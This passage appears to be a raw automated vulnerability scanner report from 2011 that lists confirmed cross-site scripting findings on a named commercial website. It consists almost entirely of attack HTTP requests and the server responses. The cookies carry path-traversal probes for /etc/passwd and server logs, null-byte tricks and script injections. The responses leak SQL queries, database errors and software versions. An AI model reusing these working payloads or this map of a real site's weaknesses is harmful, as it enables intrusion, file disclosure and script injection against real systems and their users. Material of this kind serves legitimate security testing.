OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hcsdo70qe0f48i3mpm0rhp1rg2; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00058E)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/phsy00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00058B)%3C/script%3E

/ppc/leadflow/phsy00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00058B)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 110009
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x00058B)</script>

Request

GET /ppc/leadflow/phsy00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00058B)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=nguqsj82l635jj5v83u9jetqn3; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00058B)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/phsy00/

/ppc/leadflow/phsy00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/?'"--></style></script><script>alert(0x000578)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000578)</script>

Request

GET /ppc/leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=q8gt4lsalerlpt2e139jqqh580; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>' OR prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>' OR prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>' OR prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>' OR prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>' OR prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000578)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lgds00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00058D)%3C/script%3E

/ppc/leadflow/lgds00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00058D)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x00058D)</script>

Request

GET /ppc/leadflow/lgds00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00058D)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
